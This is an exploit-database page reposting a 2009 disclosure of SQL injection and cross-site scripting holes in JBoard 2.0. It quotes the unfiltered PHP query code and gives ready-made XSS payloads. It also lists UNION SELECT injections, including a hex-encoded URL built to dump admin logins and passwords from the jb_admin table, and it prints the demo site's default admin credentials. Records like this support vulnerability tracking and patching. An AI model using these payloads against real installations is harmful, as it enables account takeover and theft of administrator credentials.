JBoard <= 2.0 Commercial Version Sql/Xss Exploit

2009-09-04 / 2009-09-05

Credit: Inj3ct0r

Risk: High

Local: No

Remote: Yes

CVE: CVE-2009-3059 | CVE-2009-3060

CWE: CWE-89
CWE-79

================================================
JBoard <= 2.0 Commercial Version Sql/Xss Exploit
================================================


1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0                          
0     _                   __           __       __                     1
1   /' \            __  /'__`\        /\ \__  /'__`\                   0
0  /\_, \    ___   /\_\/\_\ \ \    ___\ \ ,_\/\ \/\ \  _ ___           1
1  \/_/\ \ /' _ `\ \/\ \/_/_\_<_  /'___\ \ \/\ \ \ \ \/\`'__\          0
0     \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/           1
1      \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\           0
0       \/_/\/_/\/_/\ \_\ \/___/  \/____/ \/__/ \/___/  \/_/           1
1                  \ \____/ >> Exploit database separated by exploit   0
0                   \/___/          type (local, remote, DoS, etc.)    1
1                                                                      0
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-1

#[+] Discovered By   : Inj3ct0r
#[+] Site            : Inj3ct0r.com
#[+] Support e-mail  : submit[at]inj3ct0r.com
#[+] Visit : inj3ct0r.com , inj3ct0r.org , inj3ct0r.net


Site product: http://allpublication.ru/
Demo: http://allpublication.ru/board/demo/
admin; admin
Version: 2.0

-----------------------------------------------------------------

Xss Exploit:

editform.php?notice=<script>alert('www.inj3ct0r.com')</script>

*?user_title=</title><script>alert('www.inj3ct0r.org')</script>

*any pages because vulnerability in inc/head.inc.php

core/edit_user_message.php?edit_user_message="><script>alert(www.inj3ct0r.net)</script><noscript>

------------------------------------------------------------------


SQL-Inj3ct0r Exploit:  

1) sboard.php

elseif (!@$_GET['id_mess'] && !@$_GET['id_cat'] && (@$_GET['op'] == "all_cat" || @$_GET['city'])) require_once("core/all_cat.php");

2) all_cat.php

if ($c['print_top'] == "yes") require_once("inc/top_add.inc.php"); 

3) top_add.inc.php

There is a request to the database with the parameter $_GET['city'], which is never filtered

if (@$_GET['city']) 
{ 
    $from_city_query = mysql_query ("SELECT city_name FROM jb_city WHERE city_translit = '".$_GET['city']."' LIMIT 1");  
    if (mysql_num_rows ($from_city_query) == 1) 
    { 
        $from_city = mysql_fetch_assoc ($from_city_query); 
        $city_from_search = " AND city = '".$from_city['city_name']."' "; 

The result is used in the second query:

 $top_add = mysql_query ("SELECT A.id as board_id, A.*, B.* FROM jb_board as A, jb_board_cat as B WHERE A.id_category = B.id AND old_mess = 'old' ".@$city_from_search." ORDER by hits DESC LIMIT $limit");  
if (mysql_num_rows($top_add)) 
{ 
?> 

<H4><?=$lang[610]?></H4> 
<table border="0" class="GRayBox" cellpadding="0" cellspacing="0"> 
  <tr class="top"> 
    <td class="img1">&nbsp;</td> 
    <td class="img2">&nbsp;</td> 
    <td class="img3">&nbsp;</td> 
  </tr> 
  <tr> 
    <td class="imgL">&nbsp;</td> 
    <td class="t"><a href="#"> 
      <? 
    while ($top = mysql_fetch_assoc ($top_add)) 
    { 
        $tip = str_replace("\r\n"," ", htmlspecialchars($top['text'])); 
        echo "<a href=\"".$h."/advertisement/nesting/".$top['id_category']."/kind/".$top['board_id']."/\" onmouseover=\"Tip('".$tip."')\"><strong>".$top['title']."</strong></a>"; 


Request number 1:

a 'UNION SELECT 1 --

Request number 2:

a 'UNION SELECT 1,2,3,4,5,6, concat_ws (0x3,login,password), 8,9,10,1 1,12,13,14,15,16,17,18,19, 20,21,22,23,24,25,26,27, 28,29,30,31,32,33,34 FROM jb_admin --
Transferred to the number (* 16):
0x612720554e494f4e2053454c45435420312c322c332c342c352c362c636f6e6361745f7773283078332c6c6f67696e2c70617373776f7264292c382c392c31302c31312c31322c31332c31342c31352c31362c31372c31382c31392c32302c32312c32322c32332c32342c32352c32362c32372c32382c32392c33302c33312c33322c33332c33342046524f4d206a625f61646d696e202d2d20

As a result, we obtain the following query:

sboard.php?city=a'+union+select+0x612720554e494f4e2053454c45435420312c322c332c342c352c362c636f6e6361 745f7773283078332c6c6f67696e2c70617373776f7264292c 382c392c31302c31312c31322c31332c31342c31352c31362c 31372c31382c31392c32302c32312c32322c32332c32342c32 352c32362c32372c32382c32392c33302c33312c33322c3333 2c33342046524f4d206a625f61646d696e202d2d20% 20 -% 20

-------------------------------------------------------------------

SQL-Inj3ct0r Exploit:

POST request to /core/select.php

aaaaaaa 'UNION SELECT 1,2, concat_ws (0x3, login, password), 4,5,6 FROM jb_admin --
Output will be the last element of the drop-down
A vulnerable piece of code: paste the whole file)

---------------------------------

ThE End =]  Visit my proj3ct  :

http://inj3ct0r.com
http://inj3ct0r.org
http://inj3ct0r.net


# ~  - [ [ : Inj3ct0r : ] ]

Referencje:

http://www.vupen.com/english/advisories/2009/2473

http://packetstormsecurity.org/0908-exploits/jboard-sql.txt

See this note in RAW Version

Vote for this issue:

50%

Thanks for you vote!

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.

Nick (*)

Email (*)

Video

Text (*)

(*) - required fields.

{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1

{{ x.comment }}

JBoard <= 2.0 Commercial Version Sql/Xss Exploit

Referencje:

Thanks for you vote!

Thanks for you comment!Your message is in quarantine 48 hours.

Thanks for you comment!
Your message is in quarantine 48 hours.